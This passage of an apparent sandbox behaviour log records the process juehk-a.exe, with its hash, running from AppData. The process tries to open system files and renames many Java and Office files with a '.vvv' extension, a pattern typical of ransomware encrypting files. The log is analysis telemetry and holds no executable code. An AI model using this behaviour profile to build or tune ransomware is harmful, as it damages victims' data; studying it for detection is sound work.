28972.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28973.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28974.            ads:
28975.          fid (ads:): 0
28976.          failure: open
28977.          ntstatus: 0xc0000022
28978.          CreateOptions: 0x60
28979.        file:
28980.          timestamp: 92542
28981.          mode: failed
28982.          sequenceNumber: 2048
28983.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png
28984.          processinfo:
28985.            pid: 1648
28986.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
28987.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
28988.            ads:
28989.          fid (ads:): 0
28990.          failure: open
28991.          ntstatus: 0xc0000022
28992.          CreateOptions: 0x60
28993.        file:
28994.          timestamp: 92548
28995.          mode: failed
28996.          sequenceNumber: 2049
28997.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\203x8subpicture.png
28998.          processinfo:
28999.            pid: 1648
29000.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29001.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29002.            ads:
29003.          fid (ads:): 0
29004.          failure: open
29005.          ntstatus: 0xc0000022
29006.          CreateOptions: 0x60
29007.        file:
29008.          timestamp: 92554
29009.          mode: failed
29010.          sequenceNumber: 2050
29011.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png
29012.          processinfo:
29013.            pid: 1648
29014.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29015.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29016.            ads:
29017.          fid (ads:): 0
29018.          failure: open
29019.          ntstatus: 0xc0000022
29020.          CreateOptions: 0x60
29021.        file:
29022.          timestamp: 92561
29023.          mode: failed
29024.          sequenceNumber: 2051
29025.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_SelectionSubpicture.png
29026.          processinfo:
29027.            pid: 1648
29028.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29029.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29030.            ads:
29031.          fid (ads:): 0
29032.          failure: open
29033.          ntstatus: 0xc0000022
29034.          CreateOptions: 0x60
29035.        file:
29036.          timestamp: 92568
29037.          mode: failed
29038.          sequenceNumber: 2052
29039.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png
29040.          processinfo:
29041.            pid: 1648
29042.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29043.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29044.            ads:
29045.          fid (ads:): 0
29046.          failure: open
29047.          ntstatus: 0xc0000022
29048.          CreateOptions: 0x60
29049.        file:
29050.          timestamp: 92574
29051.          mode: failed
29052.          sequenceNumber: 2053
29053.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png
29054.          processinfo:
29055.            pid: 1648
29056.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29057.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29058.            ads:
29059.          fid (ads:): 0
29060.          failure: open
29061.          ntstatus: 0xc0000022
29062.          CreateOptions: 0x60
29063.        file:
29064.          timestamp: 92580
29065.          mode: failed
29066.          sequenceNumber: 2054
29067.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_ButtonGraphic.png
29068.          processinfo:
29069.            pid: 1648
29070.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29071.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29072.            ads:
29073.          fid (ads:): 0
29074.          failure: open
29075.          ntstatus: 0xc0000022
29076.          CreateOptions: 0x60
29077.        file:
29078.          timestamp: 92587
29079.          mode: failed
29080.          sequenceNumber: 2055
29081.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png
29082.          processinfo:
29083.            pid: 1648
29084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29086.            ads:
29087.          fid (ads:): 0
29088.          failure: open
29089.          ntstatus: 0xc0000022
29090.          CreateOptions: 0x60
29091.        file:
29092.          timestamp: 92594
29093.          mode: failed
29094.          sequenceNumber: 2056
29095.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png
29096.          processinfo:
29097.            pid: 1648
29098.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29099.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29100.            ads:
29101.          fid (ads:): 0
29102.          failure: open
29103.          ntstatus: 0xc0000022
29104.          CreateOptions: 0x60
29105.        file:
29106.          timestamp: 92615
29107.          mode: failed
29108.          sequenceNumber: 2057
29109.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\1047x576black.png
29110.          processinfo:
29111.            pid: 1648
29112.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29113.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29114.            ads:
29115.          fid (ads:): 0
29116.          failure: open
29117.          ntstatus: 0xc0000022
29118.          CreateOptions: 0x60
29119.        file:
29120.          timestamp: 92622
29121.          mode: failed
29122.          sequenceNumber: 2058
29123.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png
29124.          processinfo:
29125.            pid: 1648
29126.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29127.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29128.            ads:
29129.          fid (ads:): 0
29130.          failure: open
29131.          ntstatus: 0xc0000022
29132.          CreateOptions: 0x60
29133.        file:
29134.          timestamp: 92628
29135.          mode: failed
29136.          sequenceNumber: 2059
29137.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png
29138.          processinfo:
29139.            pid: 1648
29140.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29141.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29142.            ads:
29143.          fid (ads:): 0
29144.          failure: open
29145.          ntstatus: 0xc0000022
29146.          CreateOptions: 0x60
29147.        file:
29148.          timestamp: 92635
29149.          mode: failed
29150.          sequenceNumber: 2060
29151.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_SelectionSubpicture.png
29152.          processinfo:
29153.            pid: 1648
29154.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29155.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29156.            ads:
29157.          fid (ads:): 0
29158.          failure: open
29159.          ntstatus: 0xc0000022
29160.          CreateOptions: 0x60
29161.        file:
29162.          timestamp: 92641
29163.          mode: failed
29164.          sequenceNumber: 2061
29165.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_ButtonGraphic.png
29166.          processinfo:
29167.            pid: 1648
29168.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29169.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29170.            ads:
29171.          fid (ads:): 0
29172.          failure: open
29173.          ntstatus: 0xc0000022
29174.          CreateOptions: 0x60
29175.        file:
29176.          timestamp: 92648
29177.          mode: failed
29178.          sequenceNumber: 2062
29179.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png
29180.          processinfo:
29181.            pid: 1648
29182.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29183.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29184.            ads:
29185.          fid (ads:): 0
29186.          failure: open
29187.          ntstatus: 0xc0000022
29188.          CreateOptions: 0x60
29189.        file:
29190.          timestamp: 92655
29191.          mode: failed
29192.          sequenceNumber: 2063
29193.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_ButtonGraphic.png
29194.          processinfo:
29195.            pid: 1648
29196.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29197.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29198.            ads:
29199.          fid (ads:): 0
29200.          failure: open
29201.          ntstatus: 0xc0000022
29202.          CreateOptions: 0x60
29203.        file:
29204.          timestamp: 92662
29205.          mode: failed
29206.          sequenceNumber: 2064
29207.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_SelectionSubpicture.png
29208.          processinfo:
29209.            pid: 1648
29210.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29211.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29212.            ads:
29213.          fid (ads:): 0
29214.          failure: open
29215.          ntstatus: 0xc0000022
29216.          CreateOptions: 0x60
29217.        file:
29218.          timestamp: 92669
29219.          mode: failed
29220.          sequenceNumber: 2065
29221.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\scenesscroll.png
29222.          processinfo:
29223.            pid: 1648
29224.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29226.            ads:
29227.          fid (ads:): 0
29228.          failure: open
29229.          ntstatus: 0xc0000022
29230.          CreateOptions: 0x60
29231.        file:
29232.          timestamp: 92675
29233.          mode: failed
29234.          sequenceNumber: 2066
29235.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialmainsubpicture.png
29236.          processinfo:
29237.            pid: 1648
29238.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29239.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29240.            ads:
29241.          fid (ads:): 0
29242.          failure: open
29243.          ntstatus: 0xc0000022
29244.          CreateOptions: 0x60
29245.        file:
29246.          timestamp: 92682
29247.          mode: failed
29248.          sequenceNumber: 2067
29249.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png
29250.          processinfo:
29251.            pid: 1648
29252.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29253.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29254.            ads:
29255.          fid (ads:): 0
29256.          failure: open
29257.          ntstatus: 0xc0000022
29258.          CreateOptions: 0x60
29259.        apicall:
29260.          timestamp: 92899
29261.          repeat: 9000
29262.          sequenceNumber: 2068
29263.          processinfo:
29264.            pid: 1648
29265.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29266.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29267.          dllname: kernel32.dll
29268.          apiname: Sleep
29269.          address: 0x0041ed5b
29270.        file:
29271.          timestamp: 92909
29272.          mode: rename
29273.          sequenceNumber: 2069
29274.          filesize: 18862
29275.          processinfo:
29276.            pid: 1648
29277.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29278.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29279.          old_name: C:\Program Files\Java\jre1.7.0_0\lib\deploy\ffjcext.zip
29280.          new_name: C:\Program Files\Java\jre1.7.0_0\lib\deploy\ffjcext.zip.vvv
29281.            ads:
29282.          fid (ads:): 562949953510831
29283.          ntstatus: 0x0
29284.          CreateOptions: 0x0
29285.        file:
29286.          timestamp: 93022
29287.          mode: rename
29288.          sequenceNumber: 2070
29289.          filesize: 4654
29290.          processinfo:
29291.            pid: 1648
29292.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29293.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29294.          old_name: C:\Program Files\Java\jre1.7.0_0\lib\jvm.hprof.txt
29295.          new_name: C:\Program Files\Java\jre1.7.0_0\lib\jvm.hprof.txt.vvv
29296.            ads:
29297.          fid (ads:): 562949953510879
29298.          ntstatus: 0x0
29299.          CreateOptions: 0x0
29300.        file:
29301.          timestamp: 93126
29302.          mode: rename
29303.          sequenceNumber: 2071
29304.          filesize: 9134
29305.          processinfo:
29306.            pid: 1648
29307.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29308.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29309.          old_name: C:\Program Files\Java\jre1.7.0_0\lib\servicetag\jdk_header.png
29310.          new_name: C:\Program Files\Java\jre1.7.0_0\lib\servicetag\jdk_header.png.vvv
29311.            ads:
29312.          fid (ads:): 562949953510904
29313.          ntstatus: 0x0
29314.          CreateOptions: 0x0
29315.        file:
29316.          timestamp: 93642
29317.          mode: rename
29318.          sequenceNumber: 2072
29319.          filesize: 14686
29320.          processinfo:
29321.            pid: 1648
29322.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29323.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29324.          old_name: C:\Program Files\Java\jre1.7.0_0\README.txt
29325.          new_name: C:\Program Files\Java\jre1.7.0_0\README.txt.vvv
29326.            ads:
29327.          fid (ads:): 844424930221394
29328.          ntstatus: 0x0
29329.          CreateOptions: 0x0
29330.        file:
29331.          timestamp: 93698
29332.          mode: rename
29333.          sequenceNumber: 2073
29334.          filesize: 175950
29335.          processinfo:
29336.            pid: 1648
29337.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29338.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29339.          old_name: C:\Program Files\Java\jre1.7.0_0\THIRDPARTYLICENSEREADME.txt
29340.          new_name: C:\Program Files\Java\jre1.7.0_0\THIRDPARTYLICENSEREADME.txt.vvv
29341.            ads:
29342.          fid (ads:): 562949953510739
29343.          ntstatus: 0x0
29344.          CreateOptions: 0x0
29345.        file:
29346.          timestamp: 93784
29347.          mode: rename
29348.          sequenceNumber: 2074
29349.          filesize: 19038
29350.          processinfo:
29351.            pid: 1648
29352.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29353.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29354.          old_name: C:\Program Files\Java\jre1.7.0_60\lib\deploy\ffjcext.zip
29355.          new_name: C:\Program Files\Java\jre1.7.0_60\lib\deploy\ffjcext.zip.vvv
29356.            ads:
29357.          fid (ads:): 562949953510182
29358.          ntstatus: 0x0
29359.          CreateOptions: 0x0
29360.        file:
29361.          timestamp: 94023
29362.          mode: rename
29363.          sequenceNumber: 2075
29364.          filesize: 4654
29365.          processinfo:
29366.            pid: 1648
29367.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29368.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29369.          old_name: C:\Program Files\Java\jre1.7.0_60\lib\jvm.hprof.txt
29370.          new_name: C:\Program Files\Java\jre1.7.0_60\lib\jvm.hprof.txt.vvv
29371.            ads:
29372.          fid (ads:): 844424930220896
29373.          ntstatus: 0x0
29374.          CreateOptions: 0x0
29375.        file:
29376.          timestamp: 94361
29377.          mode: rename
29378.          sequenceNumber: 2076
29379.          filesize: 462
29380.          processinfo:
29381.            pid: 1648
29382.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29383.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29384.          old_name: C:\Program Files\Java\jre1.7.0_60\README.txt
29385.          new_name: C:\Program Files\Java\jre1.7.0_60\README.txt.vvv
29386.            ads:
29387.          fid (ads:): 562949953510068
29388.          ntstatus: 0x0
29389.          CreateOptions: 0x0
29390.        file:
29391.          timestamp: 94393
29392.          mode: rename
29393.          sequenceNumber: 2077
29394.          filesize: 125534
29395.          processinfo:
29396.            pid: 1648
29397.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29398.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29399.          old_name: C:\Program Files\Java\jre1.7.0_60\THIRDPARTYLICENSEREADME-JAVAFX.txt
29400.          new_name: C:\Program Files\Java\jre1.7.0_60\THIRDPARTYLICENSEREADME-JAVAFX.txt.vvv
29401.            ads:
29402.          fid (ads:): 562949953510070
29403.          ntstatus: 0x0
29404.          CreateOptions: 0x0
29405.        file:
29406.          timestamp: 94434
29407.          mode: rename
29408.          sequenceNumber: 2078
29409.          filesize: 177406
29410.          processinfo:
29411.            pid: 1648
29412.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29413.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29414.          old_name: C:\Program Files\Java\jre1.7.0_60\THIRDPARTYLICENSEREADME.txt
29415.          new_name: C:\Program Files\Java\jre1.7.0_60\THIRDPARTYLICENSEREADME.txt.vvv
29416.            ads:
29417.          fid (ads:): 562949953510071
29418.          ntstatus: 0x0
29419.          CreateOptions: 0x0
29420.        apicall:
29421.          timestamp: 94531
29422.          repeat: 10000
29423.          sequenceNumber: 2079
29424.          processinfo:
29425.            pid: 1648
29426.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29427.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29428.          dllname: kernel32.dll
29429.          apiname: Sleep
29430.          address: 0x0041ed5b
29431.        process:
29432.          timestamp: 94592
29433.          mode: opened
29434.          sequenceNumber: 2080
29435.          desiredaccess: 0x02000030
29436.          ntstatus: 0xc0000022
29437.          target:
29438.            processinfo:
29439.              pid: 4
29440.              tid: 0
29441.              imagepath: N/A
29442.          source:
29443.            processinfo:
29444.              pid: 1648
29445.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29446.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29447.        file:
29448.          timestamp: 94630
29449.          mode: rename
29450.          sequenceNumber: 2081
29451.          filesize: 14478
29452.          processinfo:
29453.            pid: 1648
29454.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29456.          old_name: C:\Program Files\Java\jre1.8.0_0\lib\deploy\ffjcext.zip
29457.          new_name: C:\Program Files\Java\jre1.8.0_0\lib\deploy\ffjcext.zip.vvv
29458.            ads:
29459.          fid (ads:): 562949953511504
29460.          ntstatus: 0x0
29461.          CreateOptions: 0x0
29462.        file:
29463.          timestamp: 94700
29464.          mode: rename
29465.          sequenceNumber: 2082
29466.          filesize: 4654
29467.          processinfo:
29468.            pid: 1648
29469.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29470.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29471.          old_name: C:\Program Files\Java\jre1.8.0_0\lib\jvm.hprof.txt
29472.          new_name: C:\Program Files\Java\jre1.8.0_0\lib\jvm.hprof.txt.vvv
29473.            ads:
29474.          fid (ads:): 562949953511566
29475.          ntstatus: 0x0
29476.          CreateOptions: 0x0
29477.        file:
29478.          timestamp: 94713
29479.          mode: rename
29480.          sequenceNumber: 2083
29481.          filesize: 462
29482.          processinfo:
29483.            pid: 1648
29484.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29485.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29486.          old_name: C:\Program Files\Java\jre1.8.0_0\README.txt
29487.          new_name: C:\Program Files\Java\jre1.8.0_0\README.txt.vvv
29488.            ads:
29489.          fid (ads:): 562949953511390
29490.          ntstatus: 0x0
29491.          CreateOptions: 0x0
29492.        file:
29493.          timestamp: 94742
29494.          mode: rename
29495.          sequenceNumber: 2084
29496.          filesize: 123742
29497.          processinfo:
29498.            pid: 1648
29499.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29500.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29501.          old_name: C:\Program Files\Java\jre1.8.0_0\THIRDPARTYLICENSEREADME-JAVAFX.txt
29502.          new_name: C:\Program Files\Java\jre1.8.0_0\THIRDPARTYLICENSEREADME-JAVAFX.txt.vvv
29503.            ads:
29504.          fid (ads:): 562949953511391
29505.          ntstatus: 0x0
29506.          CreateOptions: 0x0
29507.        file:
29508.          timestamp: 94792
29509.          mode: rename
29510.          sequenceNumber: 2085
29511.          filesize: 178862
29512.          processinfo:
29513.            pid: 1648
29514.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29515.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29516.          old_name: C:\Program Files\Java\jre1.8.0_0\THIRDPARTYLICENSEREADME.txt
29517.          new_name: C:\Program Files\Java\jre1.8.0_0\THIRDPARTYLICENSEREADME.txt.vvv
29518.            ads:
29519.          fid (ads:): 562949953511392
29520.          ntstatus: 0x0
29521.          CreateOptions: 0x0
29522.        file:
29523.          timestamp: 95063
29524.          mode: rename
29525.          sequenceNumber: 2086
29526.          filesize: 25182
29527.          processinfo:
29528.            pid: 1648
29529.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29530.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29531.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG
29532.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG.vvv
29533.            ads:
29534.          fid (ads:): 562949953497775
29535.          ntstatus: 0x0
29536.          CreateOptions: 0x0
29537.        file:
29538.          timestamp: 95074
29539.          mode: rename
29540.          sequenceNumber: 2087
29541.          filesize: 24798
29542.          processinfo:
29543.            pid: 1648
29544.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29545.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29546.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG
29547.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.vvv
29548.            ads:
29549.          fid (ads:): 562949953497777
29550.          ntstatus: 0x0
29551.          CreateOptions: 0x0
29552.        file:
29553.          timestamp: 95084
29554.          mode: rename
29555.          sequenceNumber: 2088
29556.          filesize: 18686
29557.          processinfo:
29558.            pid: 1648
29559.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29560.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29561.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG
29562.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG.vvv
29563.            ads:
29564.          fid (ads:): 562949953497778
29565.          ntstatus: 0x0
29566.          CreateOptions: 0x0
29567.        file:
29568.          timestamp: 95096
29569.          mode: rename
29570.          sequenceNumber: 2089
29571.          filesize: 22334
29572.          processinfo:
29573.            pid: 1648
29574.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29576.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG
29577.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG.vvv
29578.            ads:
29579.          fid (ads:): 562949953497780
29580.          ntstatus: 0x0
29581.          CreateOptions: 0x0
29582.        file:
29583.          timestamp: 95112
29584.          mode: rename
29585.          sequenceNumber: 2090
29586.          filesize: 12110
29587.          processinfo:
29588.            pid: 1648
29589.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29590.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29591.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG
29592.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG.vvv
29593.            ads:
29594.          fid (ads:): 562949953497782
29595.          ntstatus: 0x0
29596.          CreateOptions: 0x0
29597.        file:
29598.          timestamp: 95129
29599.          mode: rename
29600.          sequenceNumber: 2091
29601.          filesize: 7358
29602.          processinfo:
29603.            pid: 1648
29604.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29605.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29606.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG
29607.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG.vvv
29608.            ads:
29609.          fid (ads:): 562949953497784
29610.          ntstatus: 0x0
29611.          CreateOptions: 0x0
29612.        file:
29613.          timestamp: 95147
29614.          mode: rename
29615.          sequenceNumber: 2092
29616.          filesize: 9246
29617.          processinfo:
29618.            pid: 1648
29619.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29620.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29621.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG
29622.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG.vvv
29623.            ads:
29624.          fid (ads:): 562949953497785
29625.          ntstatus: 0x0
29626.          CreateOptions: 0x0
29627.        file:
29628.          timestamp: 95158
29629.          mode: rename
29630.          sequenceNumber: 2093
29631.          filesize: 14382
29632.          processinfo:
29633.            pid: 1648
29634.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29635.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29636.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG
29637.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG.vvv
29638.            ads:
29639.          fid (ads:): 562949953497786
29640.          ntstatus: 0x0
29641.          CreateOptions: 0x0
29642.        file:
29643.          timestamp: 95169
29644.          mode: rename
29645.          sequenceNumber: 2094
29646.          filesize: 10094
29647.          processinfo:
29648.            pid: 1648
29649.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29650.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29651.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG
29652.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG.vvv
29653.            ads:
29654.          fid (ads:): 562949953497787
29655.          ntstatus: 0x0
29656.          CreateOptions: 0x0
29657.        file:
29658.          timestamp: 95182
29659.          mode: rename
29660.          sequenceNumber: 2095
29661.          filesize: 15566
29662.          processinfo:
29663.            pid: 1648
29664.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29665.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29666.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG
29667.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.vvv
29668.            ads:
29669.          fid (ads:): 562949953497790
29670.          ntstatus: 0x0
29671.          CreateOptions: 0x0
29672.        file:
29673.          timestamp: 95194
29674.          mode: rename
29675.          sequenceNumber: 2096
29676.          filesize: 7582
29677.          processinfo:
29678.            pid: 1648
29679.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29680.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29681.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG
29682.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG.vvv
29683.            ads:
29684.          fid (ads:): 562949953497791
29685.          ntstatus: 0x0
29686.          CreateOptions: 0x0
29687.        file:
29688.          timestamp: 95224
29689.          mode: rename
29690.          sequenceNumber: 2097
29691.          filesize: 20078
29692.          processinfo:
29693.            pid: 1648
29694.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29695.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29696.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG
29697.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG.vvv
29698.            ads:
29699.          fid (ads:): 562949953497792
29700.          ntstatus: 0x0
29701.          CreateOptions: 0x0
29702.        file:
29703.          timestamp: 95235
29704.          mode: rename
29705.          sequenceNumber: 2098
29706.          filesize: 50910
29707.          processinfo:
29708.            pid: 1648
29709.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29711.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG
29712.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG.vvv
29713.            ads:
29714.          fid (ads:): 562949953497796
29715.          ntstatus: 0x0
29716.          CreateOptions: 0x0
29717.        file:
29718.          timestamp: 95247
29719.          mode: rename
29720.          sequenceNumber: 2099
29721.          filesize: 65182
29722.          processinfo:
29723.            pid: 1648
29724.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29725.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29726.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG
29727.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG.vvv
29728.            ads:
29729.          fid (ads:): 562949953497797
29730.          ntstatus: 0x0
29731.          CreateOptions: 0x0
29732.        file:
29733.          timestamp: 95278
29734.          mode: rename
29735.          sequenceNumber: 2100
29736.          filesize: 44366
29737.          processinfo:
29738.            pid: 1648
29739.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
29740.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
29741.          old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG
29742.          new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG.vvv
